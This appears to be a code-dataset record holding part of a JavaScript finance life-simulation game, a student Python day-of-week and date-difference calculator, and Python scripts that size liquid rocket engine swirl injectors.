document.getElementById(\"marriage\");\n\tvar jobButton = document.getElementById(\"jobStatus\");\n\tvar retireButton = document.getElementById(\"retire\");\n\tvar carButton = document.getElementById(\"car\");\n\tvar fwdYear = document.getElementById(\"yearProgression\");\n\tvar spendingTbl = document.getElementById(\"spendingTableModal\");\n\tvar closeSpending = document.getElementById(\"closeSpTbl\");\n\tvar year = 0;\n\tvar sideBar = document.getElementById(\"sideBar\");\n\n\tmoveButton.style.display = 
\"none\";\n\tmarriageButton.style.display = \"none\";\n\tjobButton.style.display = \"none\";\n\tretireButton.style.display = \"none\";\n\tcarButton.style.display = \"none\";\n\tfwdYear.style.display = \"none\";\n\tprogress.style.display = \"none\";\n\tbubble.style.display = \"none\";\n\tsalaryForm.style.display = \"none\";\n\tloanForm.style.display = \"none\";\n\tmoney.style.display = \"none\";\n\toption2box.style.display = \"none\";\n\toption3box.style.display = \"none\";\n\toption4box.style.display = \"none\";\n\tform1040.style.display = \"none\";\n\tW2form.style.display = \"none\";\n\n\tspendingButton.onclick = function() {\n\t\tspendingTbl.style.display = \"block\";\n\t};\n\n\tcloseSpending.onclick = function() {\n\t\tspendingTbl.style.display = \"none\";\n\t};\n\n\t// When the user clicks anywhere outside of a modal, close it\n\twindow.onclick = function(event) {\n\t\tif (event.target == spendingTbl) {\n\t spendingTbl.style.display = \"none\";\n\t }\n\t};\n\n\tmoveButton.onclick = function() {\n\t\tif (confirm(\"Are you ready to move?\")){\n\t\t\thousingLocation();\n\t\t}\n\t};\n\n\tvar couple;\n\tmarriageButton.onclick = function() {\n\t\tif (confirm(\"Are you ready to get married?\")){\n\t\t\tcouple = 1;\n\t\t\tx = x*2;\n\t\t}\n\t};\n\n\tjobButton.onclick = function() {\n\t\tif (confirm(\"Are you ready to change jobs?\")){\n\t\t\tincome();\n\t\t\tif (couple == 1) {\n\t\t\t\tx = x*2;\n\t\t\t}\n\t\t}\n\t};\n\n\tretireButton.onclick = function() {\n\t\tif (confirm(\"Are you ready to retire?\")) {\n\t\t\tx = 0;\n\t\t}\n\t};\n\n\tcarButton.onclick = function() {\n\t\tif (confirm(\"Do you need to change your vehicle situation?\")){\n\t\t\tvehicle();\n\t\t}\n\t};\n\n\tfwdYear.onclick = function() {\n\t\tif (confirm(\"Ready for another year?\")) {\n\t\t\tif (year >= 95) {\n\t\t\t\talert (\"You lived a happy life! 
Review how your savings and spendings added up\");\n\t\t\t}\n\t\t\telse {\n\t\t\t\tyear = year + 10;\n\t\t\t\tupdateYear();\n\t\t\t}\n\t\t}\n\t};\n\n\toption1box.onclick = function() {\n\t\teducation();\n\t};\n\tfunction education() {\n\t\tquestion.style.display = \"block\";\n\t\twindow.year = 18;\n\t\toption2box.style.display = \"block\";\n\t\tprogress.style.display = \"block\";\n\t\tprogress.style.width = year + '%';\n\t\tprogress.textContent = year + \" yrs old\";\n\t\tquestion.textContent = \"What is (or will be) your highest level of education?\";\n\t\toption1.textContent = \"High School\";\n\t\toption2.textContent = \"College\";\n\t\toption1box.setAttribute(\"onClick\", \"hsGraduate()\");\n\t\toption2box.setAttribute(\"onClick\", \"collegeGraduate()\");\n\t\tbubble.style.display = \"block\";\n\t\tthought.textContent = \"Those with college degrees get paid more on average than those without but also have to spend more on education\";\n\t};\n\nfunction hsGraduate() {\n\tquestion.textContent = \"Will you go to Trade School or get a job?\";\n\toption1.textContent = \"Trade School\";\n\toption2.textContent = \"Job\";\n\toption1box.addEventListener(\"click\", tradeSchool);\n\toption2box.addEventListener(\"click\", income);\n\tthought.textContent = \"Those with trade skills often make more than those who don't have any higher education.\";\n\n};\n\nfunction tradeSchool() {\n\twindow.year = 20;\n\tupdateBar();\n\tincome();\n};\n\nfunction collegeGraduate() {\n\tconsole.log(\"college Graduate b4 update: \" + year);\n\tthought.textContent = \"Going to grad school could pay off for some majors; Others may want to consider if spending the extra money and time is worthwhile!\";\n\toption3box.style.display = \"none\";\n\twindow.year = 22;\n\tupdateBar();\n\tconsole.log(\"college graduate after update: \" + year);\n\tquestion.textContent = \"Will you continue on with school or start your career?\";\n\toption1.textContent = \"Graduate School\";\n\toption2.textContent = 
\"Career\";\n\toption1box.addEventListener(\"click\", gradSchool);\n\toption2box.addEventListener(\"click\", loan);\n};\nfunction gradSchool() {\n\tthought.textContent = \"Although a Masters may take less time, some careers require a Doctorate to be taken seriously!\";\n\twindow.year = 22;\n\tupdateBar();\n\tquestion.textContent = \"What kind of degree are you getting?\";\n\toption1.textContent = \"Doctorate\";\n\toption2.textContent = \"Masters\";\n\toption3box.style.display = \"none\";\n\toption1box.addEventListener(\"click\", doctorate);\n\toption2box.addEventListener(\"click\", masters);\t\n};\n\nfunction doctorate() {\n\twindow.year = 26;\n\tupdateBar();\n\tloan();\n};\n\nfunction masters() {\n\twindow.year = 24;\n\tupdateBar();\n\tloan();\n};\n\nfunction loan() {\n\tconsole.log(\"loan before update: \" + year);\n\tbubble.style.display = \"block\";\n\tloanForm.style.display = \"block\";\n\tthought.textContent = \"Filling out your FAFSA each year can help you get low interest loans! 
You'll end up paying less in interest than with private loans.\";\n\tupdateBar();\n\tconsole.log(\"loan after update: \" + year);\n\tsalaryForm.style.display = \"none\";\n\toption1box.style.display = \"none\";\n\toption2box.style.display = \"none\";\n\toption3box.style.display = \"none\";\n\toption4box.style.display = \"none\";\n\tquestion.textContent = \"How much will you have in loans?\";\n};\n\nvar loanPymt; //global variable of loan payment\nvar loanLength; //global variable of loan length\nfunction validateForm2() {\n\tloanPymt = document.forms[\"loan\"][\"monthly_loan\"].value;\n\tloanLength = document.forms[\"loan\"][\"loan_length\"].value;\n\tif (loanPymt == \"\") {\n\t\talert(\"Loan payment must be filled out\");\n\t}\n\telse if (isNaN(loanPymt)){\n\t\talert(\"Loan payment can only contain numbers\");\n\t}\n\telse { \n\t\tif (loanLength == \"\") {\n\t\t\talert(\"Loan length must be filled out\");\n\t\t}\n\t\telse if (isNaN(loanLength)) {\n\t\t\talert(\"Loan length can only contain numbers\");\n\t\t}\n\t\telse {\n\t\t\tincome();\n\t\t}\n\t}\n};\n\nfunction income() {\n\tbubble.style.display = \"block\";\n\tloanForm.style.display = \"none\";\n\tthought.textContent = \"Depending on your education choices, some careers (and salaries) may be out of reach\";\n\tupdateBar();\n\tsalaryForm.style.display = \"block\";\n\toption1box.style.display = \"none\";\n\toption2box.style.display = \"none\";\n\toption3box.style.display = \"none\";\n\toption4box.style.display = \"none\";\n\tquestion.textContent = \"Income\";\n};\n\nvar x; //global variable of salary\nfunction validateForm() {\n\tx = document.forms[\"salary\"][\"yearly_salary\"].value;\n\tif (x == \"\") {\n\t\talert(\"Salary must be filled out\");\n\t}\n\telse if (isNaN(x)){\n\t\talert(\"Salary can only contain numbers\");\n\t}\n\telse {\n\t\tif (confirm(\"Ready to get started?\")) {\n\t\t\ttaxes();\n\t\t}\n\t}\n};\n\nfunction taxes() {\n\tmoney.style.display = \"none\";\n\tprogress.style.display = 
\"none\";\n\tcopyright.style.display = \"none\";\n\tbubble.style.display = \"none\";\n\toption1box.style.display = \"none\";\n\toption2box.style.display = \"none\";\n\toption3box.style.display = \"none\";\n\toption4box.style.display = \"none\";\n\tsalaryForm.style.display = \"none\";\n\tquestion.textContent = \"Tax forms\";\n\toption1.textContent = \"Click to continue\";\n\toption1box.addEventListener(\"click\", retirement);\n\tW2form.style.display = \"block\";\n\tform1040.style.display = \"block\";\t\n};\n\nvar retirementSavings;\nvar retirementPercent;\nvar bank;\nfunction retirement() {\n\tmoney.style.display = \"block\";\n\tmoney.textContent = \"$\" + x;\n\tbank = x;\n\tloanForm.style.display = \"none\";\n\tbubble.style.display = \"block\";\n\tcopyright.style.display = \"block\";\n\tprogress.style.display = \"block\";\n\tW2form.style.display = \"none\";\n\tform1040.style.display = \"none\";\n\tsalaryForm.style.display = \"none\";\n\tquestion.textContent = \"What percent of your salary are you putting into a 401K?\"\n\toption1box.style.display = \"block\";\n\toption2box.style.display = \"block\";\n\toption3box.style.display = \"block\";\n\toption4box.style.display = \"block\";\n\toption1.textContent = \"0%\";\n\toption2.textContent = \"5%\";\n\toption3.textContent = \"10%\";\n\toption4.textContent = \"20%\";\n\toption1box.addEventListener(\"click\", retire0);\n\toption2box.addEventListener(\"click\", retire5);\n\toption3box.addEventListener(\"click\", retire10);\n\toption4box.addEventListener(\"click\", retire20);\n};\n\nfunction retire0() {\n\tloanForm.style.display = \"none\";\n\tretirementPercent = 0;\n\tretirementFund();\n\thousingLocation();\n};\n\nfunction retire5() {\n\tloanForm.style.display = \"none\";\n\tretirementPercent = 0.05;\n\tretirementFund();\n\thousingLocation();\n};\n\nfunction retire10() {\n\tloanForm.style.display = \"none\";\n\tretirementPercent = .1;\n\tretirementFund();\n\thousingLocation();\n};\n\nfunction retire20() 
{\n\tloanForm.style.display = \"none\";\n\tretirementPercent = .2;\n\tretirementFund();\n\thousingLocation();\n};\n\nvar retirementSavings;\nfunction retirementFund() {\n\twindow.retirementSavings = retirementPercent*x;\n\twindow.bank = bank - retirementSavings;\n\tmoney.textContent = \"$\" + bank;\n};\n\nvar housingMultiplier;\nfunction housingLocation() {\n\tloanForm.style.display = \"none\";\n\tthought.textContent = \"Be aware that in some cities (NYC, Chicago, LA), rent will be much more expensive, while cheaper in others (Cincinnati). Also consider your commute to work!\"\n\toption3box.style.display = \"none\";\n\toption4box.style.display = \"none\";\n\tform1040.style.display = \"none\";\n\tW2form.style.display = \"none\";\n\tsalaryForm.style.display = \"none\";\n\toption1box.style.display = \"block\";\n\toption2box.style.display = \"block\";\n\tquestion.textContent = \"Where will you live (location)?\";\n\toption1.textContent = \"City\";\n\toption2.textContent = \"Suburbs\";\n\toption1box.addEventListener(\"click\", city);\n\toption2box.addEventListener(\"click\", suburbs);\n};\n\nfunction city() {\n\thousingMultiplier = 2;\n\thousingType();\n};\n\nfunction suburbs() {\n\thousingMultiplier = 1;\n\thousingType();\n};\n\nvar rent;\nfunction housingType() {\n\tbubble.style.display = \"none\";\n\tloanForm.style.display = \"none\";\n\tsalaryForm.style.display = \"none\";\n\tquestion.textContent = \"Where will you live?\";\n\toption1box.style.display = \"block\";\n\toption2box.style.display = \"block\";\n\toption3box.style.display = \"block\";\n\toption4box.style.display = \"none\";\n\toption1.textContent = \"High-End Apartment\";\n\toption2.textContent = \"Cheap Apartment\";\n\toption3.textContent = \"House\";\n\toption1box.addEventListener(\"click\", highEndApt);\n\toption2box.addEventListener(\"click\", cheapApt);\n\toption3box.addEventListener(\"click\", house);\n};\n\nfunction highEndApt() {\n\t/*option1box.removeEventListener(\"click\", 
highEndApt);\n\toption2box.removeEventListener(\"click\", cheapApt);\n\toption3box.removeEventListener(\"click\", house);*/\n\trent = 8400;\n\t/*bank = bank - rent;\n\tmoney.textContent = \"$\" + bank;*/\n\troommate();\n};\n\nfunction cheapApt() {\n\t/*option1box.removeEventListener(\"click\", highEndApt);\n\toption2box.removeEventListener(\"click\", cheapApt);\n\toption3box.removeEventListener(\"click\", house);*/\n\trent = 6600;\n\t/*bank = bank - rent;\n\tmoney.textContent = \"$\" + bank;*/\n\troommate();\n};\n\nfunction house() {\n\t/*option1box.removeEventListener(\"click\", highEndApt);\n\toption2box.removeEventListener(\"click\", cheapApt);\n\toption3box.removeEventListener(\"click\", house);*/\n\trent = 10000;\n\t/*bank = bank - rent;\n\tmoney.textContent = \"$\" + bank;*/\n\troommate();\n};\n\nvar roommateMultiplier;\nfunction roommate() {\n\tbubble.style.display = \"block\";\n\tthought.textContent = \"Having a roommate may make your living situation more cost efficient!\";\n\tsalaryForm.style.display = \"none\";\n\tloanForm.style.display = \"none\";\n\toption1box.style.display = \"block\";\n\toption2box.style.display = \"block\";\n\toption3box.style.display = \"none\";\n\tquestion.textContent = \"Will you have a roommate?\";\n\toption1.textContent = \"Yes\";\n\toption2.textContent = \"No\";\n\toption1box.addEventListener(\"click\", shareLiving);\n\toption2box.addEventListener(\"click\", dontShareLiving);\n};\n\nfunction shareLiving() {\n\troommateMultiplier = 0.5;\n\thousingUpdate()\n};\n\nfunction dontShareLiving() {\n\troommateMultiplier = 1;\n\thousingUpdate();\n};\n\nvar yearlyRent;\nfunction housingUpdate(){\n\tyearlyRent = roommateMultiplier*rent*housingMultiplier;\n\tmoveButton.style.display = \"block\";\n\tconsole.log(\"yearly rent: \" + yearlyRent);\n\tconsole.log(\"bank before rent: \" + bank);\n\tbank = bank - yearlyRent;\n\tconsole.log(\"bank after rent: \" + bank);\n\tmoney.textContent = \"$\" + bank;\n\tvehicle();\n};\n\nfunction vehicle() 
{\n\tquestion.textContent = \"Do you need a vehicle? (drive to work etc.)\";\n\tsalaryForm.style.display=\"none\";\n\toption1box.style.display = \"block\";\n\toption2box.style.display = \"block\";\n\toption1.textContent = \"Yes\";\n\toption2.textContent = \"No\";\n\toption3box.style.display = \"none\";\n\toption1box.addEventListener(\"click\", vehicleCost);\n\toption2box.addEventListener(\"click\", healthIns);\n};\n\nvar carCost;\nfunction vehicleCost() {\n\tquestion.textContent = \"What are your car payments like?\";\n\toption1box.style.display = \"block\";\n\toption2box.style.display = \"block\";\n\toption3box.style.display = \"block\";\n\toption1.textContent = \"Car already paid off (no insurance/parents pay)\";\n\toption2.textContent = \"Car paid off but insurance being paid\";\n\toption3.textContent = \"Car payment and insurance\";\n\tbubble.style.display = \"none\";\n\toption3box.style.display = \"car and insurance payments monthly\";\n\toption1box.addEventListener(\"click\", nocarpymt);\n\toption2box.addEventListener(\"click\", carIns);\n\toption3box.addEventListener(\"click\", carInsPymt);\n\tcarButton.style.display = \"block\";\n};\n\nfunction nocarpymt() {\n\tcarCost = 0;\n\tcarUpdate();\n};\n\nfunction carIns() {\n\tcarCost = 120;\n\tcarUpdate();\n};\n\nfunction carInsPymt() {\n\tcarCost = 400;\n\tcarUpdate();\n};\n\nfunction carUpdate() {\n\tbank = bank - carCost;\n\tmoney.textContent = \"$\" + bank;\n\thealthInsurance();\n};\n\nvar healthInsCost;\nfunction healthInsurance() {\n\tquestion.textContent = \"Do you have health insurance?\";\n\toption3box.style.display = \"block\";\n\toption4box.style.display = \"block\";\n\toption1.textContent = \"Yes, provided through my job\";\n\toption2.textContent = \"Yes, still apart of my parents\";\n\toption3.textContent = \"Yes, paid for by self\";\n\toption4.textContent = \"No\";\n\toption1box.addEventListener(\"click\", jobIns);\n\toption2box.addEventListener(\"click\", 
parIns);\n\toption3box.addEventListener(\"click\", selfIns);\n\toption4box.addEventListener(\"click\", noIns);\n};\n\nfunction jobIns() {\n\thealthInsCost = 1100;\n\tInsUpdate();\n};\n\nfunction parIns() {\n\thealthInsCost = 0;\n\tInsUpdate();\n};\n\nfunction selfIns() {\n\thealthInsCost = 6200;\n\tInsUpdate();\n};\n\nfunction noIns() {\n\thealthInsCost = 0;\n\tInsUpdate();\n};\n\nfunction InsUpdate() {\n\tbank = bank - healthInsCost;\n\tmoney.textContent = \"$\" + bank;\n\tsummary();\n};\n\nfunction summary() {\n\tbubble.style.display = \"none\";\n\tquestion.textContent = \"From this point on, your life events occur when you want them to. Use the side buttons to continue your life.\";\n\toption1box.style.display = \"block\";\n\toption1.textContent = \"Exit\";\n\toption1box.style.display = \"none\";\n\toption2box.style.display = \"none\";\n\toption3box.style.display = \"none\";\n\tmoveButton.style.display = \"block\";\n\tmarriageButton.style.display = \"block\";\n\tretireButton.style.display = \"block\";\n\tcarButton.style.display = \"block\";\n\tfwdYear.style.display = \"block\";\n};\n\nfunction marriage() {\n\tquestion.textContent = \"Do you want to get married?\";\n\toption1box.style.display = \"block\";\n\toption2box.style.display = \"block\";\n\toption3box.style.display = \"none\";\n\toption4box.style.display = \"none\";\n\toption1.textContent = \"Yes\";\n\toption2.textContent = \"No\";\n\toption1box.addEventListener(\"click\", children);\n\toption2box.addEventListener(\"click\", children);\n};\n\nfunction updateBar() {\n\tprogress.style.width = year + \"%\";\n\tprogress.textContent = year + \" yrs old\";\n};\n/*\nwhen (year>65) {\n\n};\n*/\n\n$(\"#salary\").submit(function(e) {\n\te.preventDefault();\n});\t\n$(\"#loan\").submit(function(e) {\n\te.preventDefault();\n});\n};\n" } ]
3
demmanuel2004/Create-Task
https://github.com/demmanuel2004/Create-Task
0984348f1760957d8f1292d56ff4adab606a458c
5f69adb628631a8b6037d1794bdec4402215bc81
b27b6cfffe8c16e22e29f333bf2b2ef337ad9c25
refs/heads/master
2021-05-21T20:38:42.000977
2020-05-10T23:56:59
2020-05-10T23:56:59
252,791,518
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.6203798055648804, "alphanum_fraction": 0.657341480255127, "avg_line_length": 36.56687927246094, "blob_id": "a8dcd6f2f8cac409cfc8985bbab4afe1b65175c4", "content_id": "4788600405c471cad7b81371822feb48721e373b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5898, "license_type": "no_license", "max_line_length": 165, "num_lines": 157, "path": "/Main.py", "repo_name": "demmanuel2004/Create-Task", "src_encoding": "UTF-8", "text": "#Created By Daniel Emmanuel and Lukas Mikulenas \nimport calendar\n\ndef findday(date):\n day , month , year = (int(i) for i in date.split(' '))\n daynumber = calendar.weekday(day , month , year )\n days = ['Monday' , 'Tuesday' , 'Wednesday' , 'Thursay' , 'Friday' , 'Saturday' , 'Sunday']\n return (days[daynumber])\n\n date1 = ' 03 02 2019 '\n print(findday(date1))\n #from datetime import datetime, date\n#Created By Lukas Mikulenas\ndef day_year(user_year):\n if user_year <= 1699 and user_year >= 1600:\n global year_addition \n year_addition = 6 \n elif user_year <= 1799 and user_year >= 1700:\n year_addition = 4 \n elif user_year <= 1899 and user_year >= 1700:\n year_addition = 2\n elif user_year <= 1999 and user_year >= 1900:\n year_addition = 0\n elif user_year <= 2000 and user_year >= 2099:\n year_addition = 6 \n\ndef day_month(user_month):\n if user_month == 1 or user_month == 10:\n global month_addition\n month_addition = 0 \n elif user_month == 2 or user_month == 3:\n month_addition = 3 \n elif user_month == 4 or user_month == 7:\n month_addition = 6\n elif user_month == 5:\n month_addition = 1\n elif user_month == 6:\n month_addition = 4\n elif user_month == 7:\n month_addition = 6\n elif user_month == 8:\n month_addition = 2\n elif user_month == 9 or user_month == 12:\n month_addition = 5\n elif user_month == 11:\n month_addition = 3\n\nname = input(\"Welcome user, what is your name? 
\\n\"); \nuser_year = int(input(\"Welcome \" + name +\" \\n\" \"Enter the year between the years 1600 and 2099. Please format it in numbers only <1999, etc>: \\n\")); \nwhile user_year > 3000 or user_year < 1599:\n user_year = int(input(\"Invalid Year! Please enter a year that is between 1600 and 2099. \\n\"))\nuser_month = int(input(\"Now \" + name + \", Enter the number of the month your day is located in. Please format it in numbers only <for example, June will be 6>: \\n\"))\n\ndef leap_year_addition(user_year):\n if user_year % 4 == 0:\n global subtract_year\n subtract_year = 1 \n elif user_year % 4 != 0:\n subtract_year = 0 \n\nwhile user_month > 13 or user_year < 0:\n user_month = int(input(\"Invalid Month! Please enter a month that is between 1 and 12. \\n\"))\nuser_day = int(input(\"Finally \" + name + \", Enter the number day of the month in numbers please <1, 3, etc>: \\n\"))\n\nwhile user_day > 31 or user_year < 0:\n user_day = int(input(\"Invalid Day! Please enter a day that is between 31 and 1. 
\\n\"))\nday_month(user_month)\n\ndef main_calculation(user_year, user_month, user_day, month_addition):\n day_year(user_year)\n leap_year_addition(user_year)\n if user_year <= 1699 and user_year >= 1600:\n century_addition = 6 \n elif user_year <= 1799 and user_year >= 1700:\n century_addition = 4 \n elif user_year <= 1899 and user_year >= 1800:\n century_addition = 2\n elif user_year <= 1999 and user_year >= 1900:\n century_addition = 0\n elif user_year <= 2099 and user_year >= 2000:\n century_addition = 6 \n last_user_year = int(str(user_year)[2:4])\n\n if subtract_year == 1 and user_month != 2:\n counter_subtract = 1\n elif subtract_year == 0:\n counter_subtract = 0\n elif subtract_year == 1 and user_month == 2:\n counter_subtract = 0 \n day_calculated = user_day + month_addition + century_addition + last_user_year - subtract_year + counter_subtract + last_user_year / 4 \n global day_number_calculated\n day_number_calculated = day_calculated % 7\n global fixed_last_user_year \n fixed_last_user_year = day_number_calculated\n fixed_last_user_year = float(str(fixed_last_user_year)[0:2])\n if fixed_last_user_year == 0:\n print (\"It will be Sunday!\")\n elif fixed_last_user_year == 1:\n print (\"It Will be Monday!\")\n elif fixed_last_user_year == 2:\n print (\"It Will be Tuesday!\")\n elif fixed_last_user_year == 3:\n print (\"It Will be Wedensday!\")\n elif fixed_last_user_year == 4:\n print (\"It Will be Thursday!\")\n elif fixed_last_user_year == 5:\n print (\"It Will be Friday!\")\n elif fixed_last_user_year == 6:\n print (\"It Will be Saturday!\")\nmain_calculation(user_year, user_month, user_day, month_addition)\n\n#Created by Daniel Emmanuel\nfrom datetime import datetime, date\n# to calculate no of days between two given dates \n\ndef no_of_days(start,end):\n if start > end :\n diff = start - end \n else:\n diff = end - start \n print(\"You have %d days of time left\" % diff.days)\n#Print no of days between two different dates entered by user , stored in 
diff \n\n#Asking the user to whether to count no of days or not \nanswer = input(\"Continue? Enter yes to find the number of days between two dates: \")\nif answer == \"yes\":\n print(\"\\n Welcome back \" + name +\". Calculate number of days between two given dates <year>-<month>-<date> :\\n\")\n fdate = input(\"Enter the Start date :- \")\n start = datetime.strptime(fdate, \"%Y-%m-%d\")\n # %m will check month no should be from 1-12\n # %d will check that date should be from 1-31\n ldate = input(\"Enter the last date :- \")\n end = datetime.strptime(ldate, \"%Y-%m-%d\")\n no_of_days(start , end)\n print(\"\\n Thank you \" + name +\" for using this program\")\nelse:\n print(\"\\n Thank you \" + name +\" for using this program\")\n\n\n''' Algorithm :\nStep 1 : Input name of user.\nStep 2 : Call day of week \nStep 3 : Input answer(yes/no)\nStep 4 : If answer is yes , then goto step 6.\nStep 5 : If answer is no , them goto step 10\nStep 6 : Print name of user .\nStep 7 : Input start date in format defined in strptime , predefined function in datetime module .\nStep 8 : Input end date in format defined in strptime , predefined function in datetime module \nStep 9 : Call no_of_days(start , end)\nStep 10 : Exit.\nAlgorithm to calculate no of days between two dates\nno_of_days(start , end)\nStep 1 : If start > end , then\n\tdiff = start - end\nStep 2 : If start <= end , then\n\tdiff = end - start \nStep 3 : Print no of days between two different dates entered by user , stored in diff '''\n" } ]
1
caiorsf/turbo-bassoon
https://github.com/caiorsf/turbo-bassoon
3a7e6d0fbd8e5443217a914e791cc0cd94f97fb9
00e022cdb6a3a05b5ccc4c43a267896a83731269
7a4d124bfea6e2faeb6f9f039a8372ede87935a3
refs/heads/master
2020-08-26T21:21:26.079747
2019-10-23T20:59:41
2019-10-23T20:59:41
217,152,235
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5070129632949829, "alphanum_fraction": 0.5610389709472656, "avg_line_length": 28.015625, "blob_id": "05026c8c63a14b133391e77add0b144197951109", "content_id": "885ec926e7200e4a1296587873ec9c46dfff041e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1937, "license_type": "no_license", "max_line_length": 125, "num_lines": 64, "path": "/Swirl Injector Combustivel.py", "repo_name": "caiorsf/turbo-bassoon", "src_encoding": "UTF-8", "text": "import numpy as np\r\nfrom scipy.optimize import fsolve, minimize\r\nimport math\r\ndef truncate(number, digits) -> float:\r\n stepper = 10.0 ** digits\r\n return math.trunc(stepper * number) / stepper\r\n\r\n#FUEL\r\n\r\n#VARIABLES\r\nr_kc0=4.5e-3\r\nr_ksc=r_kc0\r\nr_bxc0=0.3e-3\r\n\r\n#CONSTANTS\r\n##Condições de projeto\r\n###Parâmetros do liquido\r\ndelta_p=7.1e5 #Queda de pressão\r\nrho_c=800 #Densidade \r\nu_kc=2e-6 #Viscosidade cinemática\r\nmass_rc_target=0.0722 #Vazão mássica requerida\r\n###Parâmetros geométricos\r\nXi_yc=1.1 #Razão entre o raio de entrada do canal tangencial e seu diâmetro\r\nl_bxc=6*r_bxc0 #Comprimento do canal tangencial\r\nn_c=6 #Número de canais tangenciais\r\n\r\nK_c=1\r\n\r\ndef func(u):\r\n r_kc=u[0]\r\n r_bxc=u[1]\r\n R_bxc=r_kc-r_bxc\r\n A_c=R_bxc*r_ksc / (n_c*r_bxc**2)\r\n c=2**0.5*r_ksc*(r_kc-r_bxc)\r\n f=c/(2*n_c*r_bxc**2)\r\n phi_c=float(fsolve(lambda x: f*x**1.5+x-1, 1.0))\r\n print('phi_c:'+str(phi_c))\r\n mu_c=phi_c*(phi_c/(2-phi_c))**0.5\r\n print('mu_c:'+str(mu_c))\r\n #r_asc=((1-phi_c)*r_ksc)**0.5\r\n f_ksc=np.pi*r_ksc**2\r\n mass_ic=mu_c*f_ksc*(2*rho_c*delta_p)**0.5\r\n W_c=mass_ic/(n_c*np.pi*r_bxc**2*rho_c)\r\n Re_c=W_c*2*r_bxc*u_kc**-1\r\n lambda_c=0.3164*Re_c**(-0.25)\r\n Xi_c=Xi_yc+lambda_c*(l_bxc/(2*r_bxc))\r\n C_c=R_bxc/r_ksc\r\n f=np.pi*r_kc**2*(2*rho_c*delta_p)**0.5\r\n g=(phi_c**-2 + (A_c**2*K_c**2) / (1-phi_c) +Xi_c*n_c*(A_c/C_c)**2)**0.5\r\n mass_rc=f/g \r\n print(\"mass_rc = {}, u = 
{}\".format(mass_rc, u))\r\n delta_mass = mass_rc - mass_rc_target\r\n return delta_mass**2\r\n\r\n\r\nu0 = np.array([r_kc0,r_bxc0])\r\n\r\nbnds=[(1e-3,10e-3),(0.5e-3,2.5e-3)]\r\n\r\nresult = minimize(func, u0, bounds=bnds, method=\"SLSQP\", tol=1e-8)\r\n\r\nresult_new=[i for i in result.x]\r\n\r\nprint('r_kc={:.1E},r_ksc={:.1E},r_bxc={:.1E},l_bxc={:.1E}'.format(result_new[0],result_new[0],result_new[1],result_new[1]*6))\r\n\r\n\r\n" }, { "alpha_fraction": 0.3604166805744171, "alphanum_fraction": 0.6333333253860474, "avg_line_length": 19.909090042114258, "blob_id": "236aeb20e8a008803f6915660cbb12ae5bfed3ce", "content_id": "b1e1d437064c1391b363ec696c4032630bde90fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 481, "license_type": "no_license", "max_line_length": 63, "num_lines": 22, "path": "/Comprimento de injeção.py", "repo_name": "caiorsf/turbo-bassoon", "src_encoding": "UTF-8", "text": "#Oxidante\r\nmass_ro = 0.1729343632791287\r\nmu_io=0.5141532076547852\r\nphi_omega_o=0.7020209970839623\r\ndelta_po=4.4e5\r\nrho_o =1140\r\n#Combustível\r\nmass_rc = 0.0721982629534907\r\nphi_c=0.1339960640658725\r\nmu_c=0.035907220197069774\r\ndelta_pc=7.1e5\r\nrho_c=800\r\n\r\nkm=mass_ro/mass_rc\r\ntau=0.11e-3\r\n\r\na=( km*mu_c / ( (km+1)*phi_c ) ) * (delta_pc/rho_c)**0.5\r\nb=( mu_io / ( ( km+1 )*phi_omega_o ) ) * (delta_po/rho_o)**0.5\r\n\r\nl_inj=(2**0.5)*tau*(a+b)\r\n\r\nprint('l_inj(m)={:.2E}'.format(l_inj))" }, { "alpha_fraction": 0.496056467294693, "alphanum_fraction": 0.5516812205314636, "avg_line_length": 27.740739822387695, "blob_id": "c3c20c99f784c82261b0ea9a0b508128770a1941", "content_id": "6ddd389dfd4f9ff44d5625c0ea75ddf6fd6e0915", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2422, "license_type": "no_license", "max_line_length": 125, "num_lines": 81, "path": "/Swirl Injector Oxidante.py", "repo_name": "caiorsf/turbo-bassoon", "src_encoding": 
"UTF-8", "text": "import numpy as np\r\nfrom scipy.optimize import fsolve, minimize,LinearConstraint\r\nimport math\r\ndef truncate(number, digits) -> float:\r\n stepper = 10.0 ** digits\r\n return math.trunc(stepper * number) / stepper\r\n\r\n#OXIDIZER\r\n\r\n#VARIABLES\r\nr_kso0=1e-3 \r\nr_bxo0=0.3e-3 \r\nr_ko0=2e-3 \r\n\r\n#CONSTANTS\r\n##Condições de projeto\r\n###Parâmetros do liquido\r\ndelta_p = 4.4e5 #Queda de pressão \r\nrho_o = 1140 #Densidade\r\nmu_o = 7.64e-6 #Viscosidade dinâmica\r\nuk_o = 1.94e-6 #Viscosidade cinemática\r\nmass_ro_target=0.1729 #Vazão mássica requerida\r\n###Parâmetros geométricos\r\nXi_yo=0.3 #Razão entre o raio de entrada do canal tangencial e seu diâmetro\r\nl_bxo=6*r_bxo0 #Comprimento do canal tangencial\r\nn_o=6 #Número de canais tangenciais\r\n\r\nbnds=[(1e-3,10e-3),(0.5e-3,2.5e-3),(1e-3,10e-3)]\r\n\r\ndef func(u):\r\n r_kso = u[0]\r\n r_bxo = u[1]\r\n r_ko = u[2]\r\n \r\n # phi_i_o\r\n c=2**0.5*r_kso*(r_ko-r_bxo)\r\n f=c/(2*n_o*r_bxo**2)\r\n\r\n phi_i_o=float(fsolve(lambda x: f*x**1.5+x-1, 1.0))\r\n\r\n # lambda_o\r\n mu_io=phi_i_o*(phi_i_o/(2-phi_i_o))**0.5\r\n print('mu_io='+str(mu_io))\r\n f_kso=np.pi*r_kso**2\r\n mass_io=mu_io*f_kso*(2*rho_o*delta_p)**0.5\r\n W_o=mass_io / ( n_o * np.pi * r_bxo**2 * rho_o )\r\n Re_o=W_o*2*r_bxo*uk_o**-1\r\n lambda_o=0.3164*Re_o**(-0.25)\r\n\r\n # A_io\r\n A_io=r_kso*(r_ko-r_bxo) / (n_o*r_bxo**2)\r\n\r\n # phi_omega_o\r\n d=2*( ( (r_ko-r_bxo)*(r_ko-r_kso-r_bxo)*lambda_o / 2 ) +n_o*r_bxo**2 )\r\n e=c/d\r\n\r\n phi_omega_o=float(fsolve(lambda x: e*x**1.5+x-1,1.0))\r\n print('phi_omega_o='+str(phi_omega_o))\r\n\r\n # A_omega_o\r\n 